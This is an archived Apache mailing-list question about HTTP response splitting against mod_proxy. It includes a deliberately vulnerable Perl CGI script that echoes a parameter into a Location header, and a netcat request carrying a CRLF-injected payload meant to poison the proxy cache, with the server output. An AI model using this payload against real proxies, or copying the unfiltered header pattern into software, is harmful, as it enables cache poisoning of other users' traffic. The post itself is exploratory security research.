Http splitting does not work with mod_proxy

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Hi list.

Hope somebody will spent some time on my question :),
or point me to the right list.

Is http splitting still works in fresh version of common applications
of apache?

I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for  each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attemt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second  GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_proxy?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

Feel free to ask any questions to get more info.

-- 
Best regards.
Gleb Pakharenko.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
   "   from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux